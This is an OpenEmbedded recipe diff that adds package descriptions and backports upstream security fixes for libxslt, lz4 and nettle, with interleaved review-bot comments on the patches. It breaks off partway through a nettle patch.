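@@ -7,6 +7,7 @@ SRC_URI = "http://download.savannah.nongnu.org/releases/libunwind/libunwind-${PV
  file://0004-Fix-build-on-mips-musl.patch \
  file://0005-ppc32-Consider-ucontext-mismatches-between-glibc-and.patch \
  file://0006-Fix-for-X32.patch \
+ file://0001-Fix-compilation-with-fno-common.patch \
  "
 SRC_URI_append_libc-musl = " file://musl-header-conflict.patch"
 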
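--- a/meta/recipes-support/liburcu/liburcu_0.11.1.bb
+++ b/meta/recipes-support/liburcu/liburcu_0.11.1.bb
@@ -1,4 +1,7 @@
 SUMMARY = "Userspace RCU (read-copy-update) library"
+DESCRIPTION = "A userspace RCU (read-copy-update) library. This data \
+synchronization library provides read-side access which scales linearly \
+with the number of cores. "
 HOMEPAGE = "http://lttng.org/urcu"
 BUGTRACKER = "http://lttng.org/project/issues"
 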
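--- a/meta/recipes-support/libusb/libusb1_1.0.22.bb
+++ b/meta/recipes-support/libusb/libusb1_1.0.22.bb
@@ -1,5 +1,7 @@
 SUMMARY = "Userspace library to access USB (version 1.0)"
-HOMEPAGE = "http://libusb.sf.net"
+DESCRIPTION = "A cross-platform library to access USB devices from Linux, \
+macOS, Windows, OpenBSD/NetBSD, Haiku and Solaris userspace."
+HOMEPAGE = "https://libusb.info"
 BUGTRACKER = "http://www.libusb.org/report"
 SECTION = "libs"
 
@@ -8,7 +10,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=fbc093901857fcd118f065f900982c24"
 
 BBCLASSEXTEND = "native nativesdk"
 
-SRC_URI = "${SOURCEFORGE_MIRROR}/libusb/libusb-${PV}.tar.bz2 \
+SRC_URI = "https://github.com/libusb/libusb/releases/download/v${PV}/libusb-${PV}.tar.bz2 \
  file://no-dll.patch \
  file://run-ptest \
  "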
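Review bot: The `SRC_URI` change at new line 13 moves the tarball download from `${SOURCEFORGE_MIRROR}` to a GitHub release URL, and the recipe's checksum lines are outside both hunks, so it cannot be confirmed from here that the pinned checksums were re-verified against the file served at the new location. A mismatching archive would fail the fetch, but stating in the commit message that the checksums are unchanged tells reviewers the origin switch did not change the artifact. `BUGTRACKER` at new line 5 still points at `http://www.libusb.org/report` although `HOMEPAGE` moved to `https://libusb.info`, so it probably wants the same update.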
diff --git a/meta/recipes-support/libxslt/libxslt/CVE-2021-30560.patch b/meta/recipes-support/libxslt/libxslt/CVE-2021-30560.patch
new file mode 100644
index 0000000000..614047ea7a
--- /dev/null
+++ b/meta/recipes-support/libxslt/libxslt/CVE-2021-30560.patch
@@ -0,0 +1,201 @@
1From 50f9c9cd3b7dfe9b3c8c795247752d1fdcadcac8 Mon Sep 17 00:00:00 2001
2From: Nick Wellnhofer <wellnhofer@aevum.de>
3Date: Sat, 12 Jun 2021 20:02:53 +0200
4Subject: [PATCH] Fix use-after-free in xsltApplyTemplates
5
6xsltApplyTemplates without a select expression could delete nodes in
7the source document.
8
91. Text nodes with strippable whitespace
10
11Whitespace from input documents is already stripped, so there's no
12need to strip it again. Under certain circumstances, xsltApplyTemplates
13could be fooled into deleting text nodes that are still referenced,
14resulting in a use-after-free.
15
162. The DTD
17
18The DTD was only unlinked, but there's no good reason to do this just
19now. Maybe it was meant as a micro-optimization.
20
213. Unknown nodes
22
23Useless and dangerous as well, especially with XInclude nodes.
24See https://gitlab.gnome.org/GNOME/libxml2/-/issues/268
25
26Simply stop trying to uselessly delete nodes when applying a template.
27This part of the code is probably a leftover from a time where
28xsltApplyStripSpaces wasn't implemented yet. Also note that
29xsltApplyTemplates with a select expression never tried to delete
30nodes.
31
32Also stop xsltDefaultProcessOneNode from deleting nodes for the same
33reasons.
34
35This fixes CVE-2021-30560.
36
37CVE: CVE-2021-30560
38Upstream-Status: Backport [https://github.com/GNOME/libxslt/commit/50f9c9cd3b7dfe9b3c8c795247752d1fdcadcac8.patch]
39Comment: No change in any hunk
40Signed-off-by: Omkar Patil <Omkar.Patil@kpit.com>
41
42---
43 libxslt/transform.c | 119 +++-----------------------------------------
44 1 file changed, 7 insertions(+), 112 deletions(-)
45
46diff --git a/libxslt/transform.c b/libxslt/transform.c
47index 04522154..3aba354f 100644
48--- a/libxslt/transform.c
49+++ b/libxslt/transform.c
50@@ -1895,7 +1895,7 @@ static void
51 xsltDefaultProcessOneNode(xsltTransformContextPtr ctxt, xmlNodePtr node,
52 xsltStackElemPtr params) {
53 xmlNodePtr copy;
54- xmlNodePtr delete = NULL, cur;
55+ xmlNodePtr cur;
56 int nbchild = 0, oldSize;
57 int childno = 0, oldPos;
58 xsltTemplatePtr template;
59@@ -1968,54 +1968,13 @@ xsltDefaultProcessOneNode(xsltTransformContextPtr ctxt, xmlNodePtr node,
60 return;
61 }
62 /*
63- * Handling of Elements: first pass, cleanup and counting
64+ * Handling of Elements: first pass, counting
65 */
66 cur = node->children;
67 while (cur != NULL) {
68- switch (cur->type) {
69- case XML_TEXT_NODE:
70- case XML_CDATA_SECTION_NODE:
71- case XML_DOCUMENT_NODE:
72- case XML_HTML_DOCUMENT_NODE:
73- case XML_ELEMENT_NODE:
74- case XML_PI_NODE:
75- case XML_COMMENT_NODE:
76- nbchild++;
77- break;
78- case XML_DTD_NODE:
79- /* Unlink the DTD, it's still reachable using doc->intSubset */
80- if (cur->next != NULL)
81- cur->next->prev = cur->prev;
82- if (cur->prev != NULL)
83- cur->prev->next = cur->next;
84- break;
85- default:
86-#ifdef WITH_XSLT_DEBUG_PROCESS
87- XSLT_TRACE(ctxt,XSLT_TRACE_PROCESS_NODE,xsltGenericDebug(xsltGenericDebugContext,
88- "xsltDefaultProcessOneNode: skipping node type %d\n",
89- cur->type));
90-#endif
91- delete = cur;
92- }
93+ if (IS_XSLT_REAL_NODE(cur))
94+ nbchild++;
95 cur = cur->next;
96- if (delete != NULL) {
97-#ifdef WITH_XSLT_DEBUG_PROCESS
98- XSLT_TRACE(ctxt,XSLT_TRACE_PROCESS_NODE,xsltGenericDebug(xsltGenericDebugContext,
99- "xsltDefaultProcessOneNode: removing ignorable blank node\n"));
100-#endif
101- xmlUnlinkNode(delete);
102- xmlFreeNode(delete);
103- delete = NULL;
104- }
105- }
106- if (delete != NULL) {
107-#ifdef WITH_XSLT_DEBUG_PROCESS
108- XSLT_TRACE(ctxt,XSLT_TRACE_PROCESS_NODE,xsltGenericDebug(xsltGenericDebugContext,
109- "xsltDefaultProcessOneNode: removing ignorable blank node\n"));
110-#endif
111- xmlUnlinkNode(delete);
112- xmlFreeNode(delete);
113- delete = NULL;
114 }
115
116 /*
117@@ -4864,7 +4823,7 @@ xsltApplyTemplates(xsltTransformContextPtr ctxt, xmlNodePtr node,
118 xsltStylePreCompPtr comp = (xsltStylePreCompPtr) castedComp;
119 #endif
120 int i;
121- xmlNodePtr cur, delNode = NULL, oldContextNode;
122+ xmlNodePtr cur, oldContextNode;
123 xmlNodeSetPtr list = NULL, oldList;
124 xsltStackElemPtr withParams = NULL;
125 int oldXPProximityPosition, oldXPContextSize;
126@@ -4998,73 +4957,9 @@ xsltApplyTemplates(xsltTransformContextPtr ctxt, xmlNodePtr node,
127 else
128 cur = NULL;
129 while (cur != NULL) {
130- switch (cur->type) {
131- case XML_TEXT_NODE:
132- if ((IS_BLANK_NODE(cur)) &&
133- (cur->parent != NULL) &&
134- (cur->parent->type == XML_ELEMENT_NODE) &&
135- (ctxt->style->stripSpaces != NULL)) {
136- const xmlChar *val;
137-
138- if (cur->parent->ns != NULL) {
139- val = (const xmlChar *)
140- xmlHashLookup2(ctxt->style->stripSpaces,
141- cur->parent->name,
142- cur->parent->ns->href);
143- if (val == NULL) {
144- val = (const xmlChar *)
145- xmlHashLookup2(ctxt->style->stripSpaces,
146- BAD_CAST "*",
147- cur->parent->ns->href);
148- }
149- } else {
150- val = (const xmlChar *)
151- xmlHashLookup2(ctxt->style->stripSpaces,
152- cur->parent->name, NULL);
153- }
154- if ((val != NULL) &&
155- (xmlStrEqual(val, (xmlChar *) "strip"))) {
156- delNode = cur;
157- break;
158- }
159- }
160- /* Intentional fall-through */
161- case XML_ELEMENT_NODE:
162- case XML_DOCUMENT_NODE:
163- case XML_HTML_DOCUMENT_NODE:
164- case XML_CDATA_SECTION_NODE:
165- case XML_PI_NODE:
166- case XML_COMMENT_NODE:
167- xmlXPathNodeSetAddUnique(list, cur);
168- break;
169- case XML_DTD_NODE:
170- /* Unlink the DTD, it's still reachable
171- * using doc->intSubset */
172- if (cur->next != NULL)
173- cur->next->prev = cur->prev;
174- if (cur->prev != NULL)
175- cur->prev->next = cur->next;
176- break;
177- case XML_NAMESPACE_DECL:
178- break;
179- default:
180-#ifdef WITH_XSLT_DEBUG_PROCESS
181- XSLT_TRACE(ctxt,XSLT_TRACE_APPLY_TEMPLATES,xsltGenericDebug(xsltGenericDebugContext,
182- "xsltApplyTemplates: skipping cur type %d\n",
183- cur->type));
184-#endif
185- delNode = cur;
186- }
187+ if (IS_XSLT_REAL_NODE(cur))
188+ xmlXPathNodeSetAddUnique(list, cur);
189 cur = cur->next;
190- if (delNode != NULL) {
191-#ifdef WITH_XSLT_DEBUG_PROCESS
192- XSLT_TRACE(ctxt,XSLT_TRACE_APPLY_TEMPLATES,xsltGenericDebug(xsltGenericDebugContext,
193- "xsltApplyTemplates: removing ignorable blank cur\n"));
194-#endif
195- xmlUnlinkNode(delNode);
196- xmlFreeNode(delNode);
197- delNode = NULL;
198- }
199 }
200 }
201
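Review bot: Both rewritten loops (patch lines 93-95 in `xsltDefaultProcessOneNode` and 187-189 in `xsltApplyTemplates`) now leave every child in the source tree, but nothing in the new code records why, and the removed lines show how easily an unlink-and-free could be reintroduced here. A short comment above each loop would keep the constraint next to the code, e.g. `/* Never unlink or free source-document nodes here; they may still be referenced (CVE-2021-30560). */`. The `xsltApplyTemplates` loop also no longer skips blank text nodes matched by `stripSpaces`; the commit message says input whitespace is already stripped, so it is worth confirming that this holds for every document that can reach this path in 1.1.34. Both function bodies continue outside their hunks.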
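--- a/meta/recipes-support/libxslt/libxslt_1.1.34.bb
+++ b/meta/recipes-support/libxslt/libxslt_1.1.34.bb
@@ -1,4 +1,9 @@
 SUMMARY = "GNOME XSLT library"
+DESCRIPTION = "libxslt is the XSLT C parser and toolkit developed for the Gnome project. \
+XSLT itself is a an XML language to define transformation for XML. Libxslt is based on \
+libxml2 the XML C library developed for the GNOME project. It also implements most of \
+the EXSLT set of processor-portable extensions functions and some of Saxon's evaluate \
+and expressions extensions."
 HOMEPAGE = "http://xmlsoft.org/XSLT/"
 BUGTRACKER = "https://bugzilla.gnome.org/"
 
@@ -9,6 +14,7 @@ SECTION = "libs"
 DEPENDS = "libxml2"
 
 SRC_URI = "http://xmlsoft.org/sources/libxslt-${PV}.tar.gz \
+ file://CVE-2021-30560.patch \
  "
 
 SRC_URI[md5sum] = "db8765c8d076f1b6caafd9f2542a304a"
@@ -16,6 +22,10 @@ SRC_URI[sha256sum] = "98b1bd46d6792925ad2dfe9a87452ea2adebf69dcb9919ffd55bf926a7
 
 UPSTREAM_CHECK_REGEX = "libxslt-(?P<pver>\d+(\.\d+)+)\.tar"
 
+# We have libxml2 2.9.10 and we don't link statically with it anyway
+# so this isn't an issue.
+CVE_CHECK_WHITELIST += "CVE-2022-29824"
+
 S = "${WORKDIR}/libxslt-${PV}"
 
 BINCONFIG = "${bindir}/xslt-config"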
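Review bot: The comment above `CVE_CHECK_WHITELIST += "CVE-2022-29824"` (new lines 25-26) does not state why the entry is safe to ignore: "We have libxml2 2.9.10" reads as if that version were unaffected, which nothing in the hunk establishes. If the reasoning is that the defect lives in libxml2 and libxslt only uses the shared library, the comment should say so and point at where the fix is carried, e.g. `# CVE-2022-29824 is a libxml2 issue; libxslt links dynamically, so it is handled in the libxml2 recipe.` A whitelist entry suppresses the cve-check report for this recipe, so confirm that the libxml2 recipe in this branch is patched or still reported for the same CVE.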
diff --git a/meta/recipes-support/lz4/files/CVE-2021-3520.patch b/meta/recipes-support/lz4/files/CVE-2021-3520.patch
new file mode 100644
index 0000000000..5ac8f6691f
--- /dev/null
+++ b/meta/recipes-support/lz4/files/CVE-2021-3520.patch
@@ -0,0 +1,27 @@
1From 8301a21773ef61656225e264f4f06ae14462bca7 Mon Sep 17 00:00:00 2001
2From: Jasper Lievisse Adriaanse <j@jasper.la>
3Date: Fri, 26 Feb 2021 15:21:20 +0100
4Subject: [PATCH] Fix potential memory corruption with negative memmove() size
5
6Upstream-Status: Backport
7https://github.com/lz4/lz4/commit/8301a21773ef61656225e264f4f06ae14462bca7#diff-7055e9cf14c488aea9837aaf9f528b58ee3c22988d7d0d81d172ec62d94a88a7
8CVE: CVE-2021-3520
9Signed-off-by: Armin Kuster <akuster@mvista.com>
10
11---
12 lib/lz4.c | 2 +-
13 1 file changed, 1 insertion(+), 1 deletion(-)
14
15Index: git/lib/lz4.c
16===================================================================
17--- git.orig/lib/lz4.c
18+++ git/lib/lz4.c
19@@ -1665,7 +1665,7 @@ LZ4_decompress_generic(
20 const size_t dictSize /* note : = 0 if noDict */
21 )
22 {
23- if (src == NULL) { return -1; }
24+ if ((src == NULL) || (outputSize < 0)) { return -1; }
25
26 { const BYTE* ip = (const BYTE*) src;
27 const BYTE* const iend = ip + srcSize;
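Review bot: The added `outputSize < 0` test at patch line 24 has no comment tying it to the memmove() problem named in the subject, so the reason for rejecting a negative size lives only in the commit message. I would add a line above the check such as `/* a negative outputSize could reach memmove() as its size (CVE-2021-3520) */`. The header also puts the upstream URL on its own line after `Upstream-Status: Backport`; the bracketed form `Upstream-Status: Backport [URL]` used by the other patches in this commit keeps the reference attached to the tag. `LZ4_decompress_generic` continues outside the hunk, so whether `srcSize` gets an equivalent guard cannot be seen here.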
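--- a/meta/recipes-support/lz4/lz4_1.9.2.bb
+++ b/meta/recipes-support/lz4/lz4_1.9.2.bb
@@ -1,5 +1,6 @@
 SUMMARY = "Extremely Fast Compression algorithm"
 DESCRIPTION = "LZ4 is a very fast lossless compression algorithm, providing compression speed at 400 MB/s per core, scalable with multi-cores CPU. It also features an extremely fast decoder, with speed in multiple GB/s per core, typically reaching RAM speed limits on multi-core systems."
+HOMEPAGE = "https://github.com/lz4/lz4"
 
 LICENSE = "BSD | BSD-2-Clause | GPL-2.0"
 LIC_FILES_CHKSUM = "file://lib/LICENSE;md5=ebc2ea4814a64de7708f1571904b32cc \
@@ -11,8 +12,13 @@ PE = "1"
 
 SRCREV = "fdf2ef5809ca875c454510610764d9125ef2ebbd"
 
-SRC_URI = "git://github.com/lz4/lz4.git;branch=dev \
+# remove at next version upgrade or when output changes
+PR = "r1"
+HASHEQUIV_HASH_VERSION .= ".1"
+
+SRC_URI = "git://github.com/lz4/lz4.git;branch=dev;protocol=https \
  file://run-ptest \
+ file://CVE-2021-3520.patch \
  "
 UPSTREAM_CHECK_GITTAGREGEX = "v(?P<pver>.*)"
 
@@ -21,7 +27,7 @@ S = "${WORKDIR}/git"
 # Fixed in r118, which is larger than the current version.
 CVE_CHECK_WHITELIST += "CVE-2014-4715"
 
-EXTRA_OEMAKE = "PREFIX=${prefix} CC='${CC}' DESTDIR=${D} LIBDIR=${libdir} INCLUDEDIR=${includedir} BUILD_STATIC=no"
+EXTRA_OEMAKE = "PREFIX=${prefix} CC='${CC}' CFLAGS='${CFLAGS}' DESTDIR=${D} LIBDIR=${libdir} INCLUDEDIR=${includedir} BUILD_STATIC=no"
 
 do_install() {
  oe_runmake install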
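Review bot: The comment at new line 15, `# remove at next version upgrade or when output changes`, says when `PR = "r1"` and `HASHEQUIV_HASH_VERSION .= ".1"` can go but not why they were added, which makes it hard to judge later whether they are still needed. If they exist because `EXTRA_OEMAKE` now passes `CFLAGS='${CFLAGS}'` and the built binaries change, the comment should say so, e.g. `# CFLAGS now reach make, so output differs; force a rebuild. Remove at next version upgrade.` The same `EXTRA_OEMAKE` line at new line 30 passes `CFLAGS` but not `LDFLAGS`, so if the aim is for the distro's build flags to apply, check whether the link step picks them up as well.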
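--- a/meta/recipes-support/lzo/lzo_2.10.bb
+++ b/meta/recipes-support/lzo/lzo_2.10.bb
@@ -1,4 +1,6 @@
 SUMMARY = "Lossless data compression library"
+DESCRIPTION = "A portable lossless data compression library written in \
+ANSI C that offers pretty fast compression and *extremely* fast decompression. "
 HOMEPAGE = "http://www.oberhumer.com/opensource/lzo/"
 SECTION = "libs"
 LICENSE = "GPLv2+"
@@ -16,6 +18,8 @@ SRC_URI[sha256sum] = "c0f892943208266f9b6543b3ae308fab6284c5c90e627931446fb49b42
 
 inherit autotools ptest
 
+CVE_PRODUCT = "lzo oberhumer:lzo2"
+
 EXTRA_OECONF = "--enable-shared"
 
 do_install_ptest() {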
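--- a/meta/recipes-support/lzop/lzop_1.04.bb
+++ b/meta/recipes-support/lzop/lzop_1.04.bb
@@ -5,6 +5,7 @@ gzip are much higher compression and decompression speed at the cost of some \n\
 compression ratio. The lzop compression utility was designed with the goals \n\
 of reliability, speed, portability and with reasonable drop-in compatibility \n\
 to gzip."
+HOMEPAGE = "http://www.lzop.org/"
 DEPENDS += "lzo"
 
 LICENSE = "GPLv2+"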
diff --git a/meta/recipes-support/mpfr/mpfr_4.0.2.bb b/meta/recipes-support/mpfr/mpfr_4.0.2.bb
index 00c2dc2fe9..0ac73f031f 100644
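--- a/meta/recipes-support/mpfr/mpfr_4.0.2.bb
+++ b/meta/recipes-support/mpfr/mpfr_4.0.2.bb
@@ -1,4 +1,5 @@
 SUMMARY = "C library for multiple-precision floating-point computations with exact rounding"
+DESCRIPTION = "The GNU Multiple Precision Floating-Point Reliable Library (GNU MPFR) is a GNU portable C library for arbitrary-precision binary floating-point computation with correct rounding, based on GNU Multi-Precision Library. MPFR's computation is both efficient and has a well-defined semantics: the functions are completely specified on all the possible operands and the results do not depend on the platform."
 HOMEPAGE = "https://www.mpfr.org/"
 LICENSE = "LGPLv3+"
 SECTION = "devel"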
diff --git a/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-1.patch b/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-1.patch
new file mode 100644
index 0000000000..cfc0f382fa
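--- /dev/null
+++ b/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-1.patch
@@ -0,0 +1,215 @@
+Backport of:
+
+From a63893791280d441c713293491da97c79c0950fe Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Niels=20M=C3=B6ller?= <nisse@lysator.liu.se>
+Date: Thu, 11 Mar 2021 19:37:41 +0100
+Subject: [PATCH] New functions ecc_mod_mul_canonical and
+ ecc_mod_sqr_canonical.
+
+* ecc-mod-arith.c (ecc_mod_mul_canonical, ecc_mod_sqr_canonical):
+New functions.
+* ecc-internal.h: Declare and document new functions.
+* curve448-eh-to-x.c (curve448_eh_to_x): Use ecc_mod_sqr_canonical.
+* curve25519-eh-to-x.c (curve25519_eh_to_x): Use ecc_mod_mul_canonical.
+* ecc-eh-to-a.c (ecc_eh_to_a): Likewise.
+* ecc-j-to-a.c (ecc_j_to_a): Likewise.
+* ecc-mul-m.c (ecc_mul_m): Likewise.
+
+(cherry picked from commit 2bf497ba4d6acc6f352bca015837fad33008565c)
+
+Upstream-Status: Backport
+https://sources.debian.org/data/main/n/nettle/3.4.1-1%2Bdeb10u1/debian/patches/CVE-2021-20305-1.patch
+CVE: CVE-2021-20305 dep1
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ ChangeLog | 11 +++++++++++
+ curve25519-eh-to-x.c | 6 +-----
+ curve448-eh-to-x.c | 5 +----
+ ecc-eh-to-a.c | 12 ++----------
+ ecc-internal.h | 15 +++++++++++++++
+ ecc-j-to-a.c | 15 +++------------
+ ecc-mod-arith.c | 24 ++++++++++++++++++++++++
+ ecc-mul-m.c | 6 ++----
+ 8 files changed, 59 insertions(+), 35 deletions(-)
+
+#diff --git a/ChangeLog b/ChangeLog
+#index fd138d82..5cc5c188 100644
+#--- a/ChangeLog
+#+++ b/ChangeLog
+#@@ -1,3 +1,14 @@
+#+2021-03-11 Niels Möller <nisse@lysator.liu.se>
+#+
+#+ * ecc-mod-arith.c (ecc_mod_mul_canonical, ecc_mod_sqr_canonical):
+#+ New functions.
+#+ * ecc-internal.h: Declare and document new functions.
+#+ * curve448-eh-to-x.c (curve448_eh_to_x): Use ecc_mod_sqr_canonical.
+#+ * curve25519-eh-to-x.c (curve25519_eh_to_x): Use ecc_mod_mul_canonical.
+#+ * ecc-eh-to-a.c (ecc_eh_to_a): Likewise.
+#+ * ecc-j-to-a.c (ecc_j_to_a): Likewise.
+#+ * ecc-mul-m.c (ecc_mul_m): Likewise.
+#+
+# 2021-02-17 Niels Möller <nisse@lysator.liu.se>
+#
+# * Released Nettle-3.7.1.
+Index: nettle-3.5.1/curve25519-eh-to-x.c
+===================================================================
+--- nettle-3.5.1.orig/curve25519-eh-to-x.c
++++ nettle-3.5.1/curve25519-eh-to-x.c
+@@ -53,7 +53,6 @@ curve25519_eh_to_x (mp_limb_t *xp, const
+ #define t2 (scratch + 2*ecc->p.size)
+
+ const struct ecc_curve *ecc = &_nettle_curve25519;
+- mp_limb_t cy;
+
+ /* If u = U/W and v = V/W are the coordiantes of the point on the
+ Edwards curve we get the curve25519 x coordinate as
+@@ -69,10 +68,7 @@ curve25519_eh_to_x (mp_limb_t *xp, const
+ ecc->p.invert (&ecc->p, t1, t0, t2 + ecc->p.size);
+
+ ecc_modp_add (ecc, t0, wp, vp);
+- ecc_modp_mul (ecc, t2, t0, t1);
+-
+- cy = mpn_sub_n (xp, t2, ecc->p.m, ecc->p.size);
+- cnd_copy (cy, xp, t2, ecc->p.size);
++ ecc_mod_mul_canonical (&ecc->p, xp, t0, t1, t2);
+ #undef vp
+ #undef wp
+ #undef t0
+Index: nettle-3.5.1/ecc-eh-to-a.c
+===================================================================
+--- nettle-3.5.1.orig/ecc-eh-to-a.c
++++ nettle-3.5.1/ecc-eh-to-a.c
+@@ -59,9 +59,7 @@ ecc_eh_to_a (const struct ecc_curve *ecc
+ /* Needs 2*size + scratch for the invert call. */
+ ecc->p.invert (&ecc->p, izp, zp, tp + ecc->p.size);
+
+- ecc_modp_mul (ecc, tp, xp, izp);
+- cy = mpn_sub_n (r, tp, ecc->p.m, ecc->p.size);
+- cnd_copy (cy, r, tp, ecc->p.size);
++ ecc_mod_mul_canonical (&ecc->p, r, xp, izp, tp);
+
+ if (op)
+ {
+@@ -81,7 +79,5 @@ ecc_eh_to_a (const struct ecc_curve *ecc
+ }
+ return;
+ }
+- ecc_modp_mul (ecc, tp, yp, izp);
+- cy = mpn_sub_n (r + ecc->p.size, tp, ecc->p.m, ecc->p.size);
+- cnd_copy (cy, r + ecc->p.size, tp, ecc->p.size);
++ ecc_mod_mul_canonical (&ecc->p, r + ecc->p.size, yp, izp, tp);
+ }
+Index: nettle-3.5.1/ecc-internal.h
+===================================================================
+--- nettle-3.5.1.orig/ecc-internal.h
++++ nettle-3.5.1/ecc-internal.h
+@@ -49,6 +49,8 @@
+ #define ecc_mod_submul_1 _nettle_ecc_mod_submul_1
+ #define ecc_mod_mul _nettle_ecc_mod_mul
+ #define ecc_mod_sqr _nettle_ecc_mod_sqr
++#define ecc_mod_mul_canonical _nettle_ecc_mod_mul_canonical
++#define ecc_mod_sqr_canonical _nettle_ecc_mod_sqr_canonical
+ #define ecc_mod_random _nettle_ecc_mod_random
+ #define ecc_mod _nettle_ecc_mod
+ #define ecc_mod_inv _nettle_ecc_mod_inv
+@@ -263,6 +265,19 @@ ecc_mod_sqr (const struct ecc_modulo *m,
+ #define ecc_modq_mul(ecc, r, a, b) \
+ ecc_mod_mul (&(ecc)->q, (r), (a), (b))
+
++/* These mul and sqr functions produce a canonical result, 0 <= R < M.
++ Requirements on input and output areas are similar to the above
++ functions, except that it is *not* allowed to pass rp = rp +
++ m->size.
++ */
++void
++ecc_mod_mul_canonical (const struct ecc_modulo *m, mp_limb_t *rp,
++ const mp_limb_t *ap, const mp_limb_t *bp, mp_limb_t *tp);
++
++void
++ecc_mod_sqr_canonical (const struct ecc_modulo *m, mp_limb_t *rp,
++ const mp_limb_t *ap, mp_limb_t *tp);
++
+ /* mod q operations. */
+ void
+ ecc_mod_random (const struct ecc_modulo *m, mp_limb_t *xp,
+Index: nettle-3.5.1/ecc-j-to-a.c
+===================================================================
+--- nettle-3.5.1.orig/ecc-j-to-a.c
++++ nettle-3.5.1/ecc-j-to-a.c
+@@ -51,8 +51,6 @@ ecc_j_to_a (const struct ecc_curve *ecc,
+ #define izBp (scratch + 3*ecc->p.size)
+ #define tp scratch
+
+- mp_limb_t cy;
+-
+ if (ecc->use_redc)
+ {
+ /* Set v = (r_z / B^2)^-1,
+@@ -86,17 +84,14 @@ ecc_j_to_a (const struct ecc_curve *ecc,
+ ecc_modp_sqr (ecc, iz2p, izp);
+ }
+
+- ecc_modp_mul (ecc, iz3p, iz2p, p);
+- /* ecc_modp (and ecc_modp_mul) may return a value up to 2p - 1, so
+- do a conditional subtraction. */
+- cy = mpn_sub_n (r, iz3p, ecc->p.m, ecc->p.size);
+- cnd_copy (cy, r, iz3p, ecc->p.size);
++ ecc_mod_mul_canonical (&ecc->p, r, iz2p, p, iz3p);
+
+ if (op)
+ {
+ /* Skip y coordinate */
+ if (op > 1)
+ {
++ mp_limb_t cy;
+ /* Also reduce the x coordinate mod ecc->q. It should
+ already be < 2*ecc->q, so one subtraction should
+ suffice. */
+@@ -106,10 +101,7 @@ ecc_j_to_a (const struct ecc_curve *ecc,
+ return;
+ }
+ ecc_modp_mul (ecc, iz3p, iz2p, izp);
+- ecc_modp_mul (ecc, tp, iz3p, p + ecc->p.size);
+- /* And a similar subtraction. */
+- cy = mpn_sub_n (r + ecc->p.size, tp, ecc->p.m, ecc->p.size);
+- cnd_copy (cy, r + ecc->p.size, tp, ecc->p.size);
++ ecc_mod_mul_canonical (&ecc->p, r + ecc->p.size, iz3p, p + ecc->p.size, iz3p);
+
+ #undef izp
+ #undef up
+Index: nettle-3.5.1/ecc-mod-arith.c
+===================================================================
+--- nettle-3.5.1.orig/ecc-mod-arith.c
++++ nettle-3.5.1/ecc-mod-arith.c
+@@ -119,6 +119,30 @@ ecc_mod_mul (const struct ecc_modulo *m,
+ }
+
+ void
++ecc_mod_mul_canonical (const struct ecc_modulo *m, mp_limb_t *rp,
++ const mp_limb_t *ap, const mp_limb_t *bp, mp_limb_t *tp)
++{
++ mp_limb_t cy;
++ mpn_mul_n (tp + m->size, ap, bp, m->size);
++ m->reduce (m, tp + m->size);
++
++ cy = mpn_sub_n (rp, tp + m->size, m->m, m->size);
++ cnd_copy (cy, rp, tp + m->size, m->size);
++}
++
++void
++ecc_mod_sqr_canonical (const struct ecc_modulo *m, mp_limb_t *rp,
++ const mp_limb_t *ap, mp_limb_t *tp)
++{
++ mp_limb_t cy;
++ mpn_sqr (tp + m->size, ap, m->size);
++ m->reduce (m, tp + m->size);
++
++ cy = mpn_sub_n (rp, tp + m->size, m->m, m->size);
++ cnd_copy (cy, rp, tp + m->size, m->size);
++}
++
++void
+ ecc_mod_sqr (const struct ecc_modulo *m, mp_limb_t *rp,
+ const mp_limb_t *ap)
+ {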
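Review bot: The contract comment added in ecc-internal.h for `ecc_mod_mul_canonical` and `ecc_mod_sqr_canonical` cannot be followed as written: "it is *not* allowed to pass rp = rp + m->size" is self-referential, and the comment never says how large `tp` must be. In the ecc-mod-arith.c bodies the product is formed by `mpn_mul_n (tp + m->size, ap, bp, m->size)`, which writes 2*m->size limbs, so `tp` needs at least 3*m->size limbs; the forbidden aliasing was presumably meant to name `tp`. Because this is a backport onto 3.5.1 and the follow-up patches call the helper in place with `rp == tp` (equal_h in CVE-2021-20305-2.patch, ecc_ecdsa_verify in CVE-2021-20305-3.patch), each caller's scratch allocation should be checked against that requirement. A comment such as `/* tp must provide 3*m->size limbs; the product is formed at tp + m->size. */` would make the requirement auditable.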
diff --git a/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-2.patch b/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-2.patch
new file mode 100644
index 0000000000..bb56b14c8c
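--- /dev/null
+++ b/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-2.patch
@@ -0,0 +1,53 @@
+Backport of:
+
+From 971bed6ab4b27014eb23085e8176917e1a096fd5 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Niels=20M=C3=B6ller?= <nisse@lysator.liu.se>
+Date: Sat, 13 Mar 2021 17:26:37 +0100
+Subject: [PATCH] Use ecc_mod_mul_canonical for point comparison.
+
+* eddsa-verify.c (equal_h): Use ecc_mod_mul_canonical.
+
+(cherry picked from commit 5b7608fde3a6d2ab82bffb35db1e4e330927c906)
+
+Upstream-Status: Backport
+https://sources.debian.org/data/main/n/nettle/3.4.1-1%2Bdeb10u1/debian/patches/CVE-2021-20305-2.patch
+CVE: CVE-2021-20305 dep2
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ ChangeLog | 4 ++++
+ eddsa-verify.c | 9 ++-------
+ 2 files changed, 6 insertions(+), 7 deletions(-)
+
+#diff --git a/ChangeLog b/ChangeLog
+#index 5cc5c188..2a9217a6 100644
+#--- a/ChangeLog
+#+++ b/ChangeLog
+#@@ -1,3 +1,7 @@
+#+2021-03-13 Niels Möller <nisse@lysator.liu.se>
+#+
+#+ * eddsa-verify.c (equal_h): Use ecc_mod_mul_canonical.
+#+
+# 2021-03-11 Niels Möller <nisse@lysator.liu.se>
+#
+# * ecc-mod-arith.c (ecc_mod_mul_canonical, ecc_mod_sqr_canonical):
+Index: nettle-3.5.1/eddsa-verify.c
+===================================================================
+--- nettle-3.5.1.orig/eddsa-verify.c
++++ nettle-3.5.1/eddsa-verify.c
+@@ -53,13 +53,8 @@ equal_h (const struct ecc_modulo *p,
+ #define t0 scratch
+ #define t1 (scratch + p->size)
+
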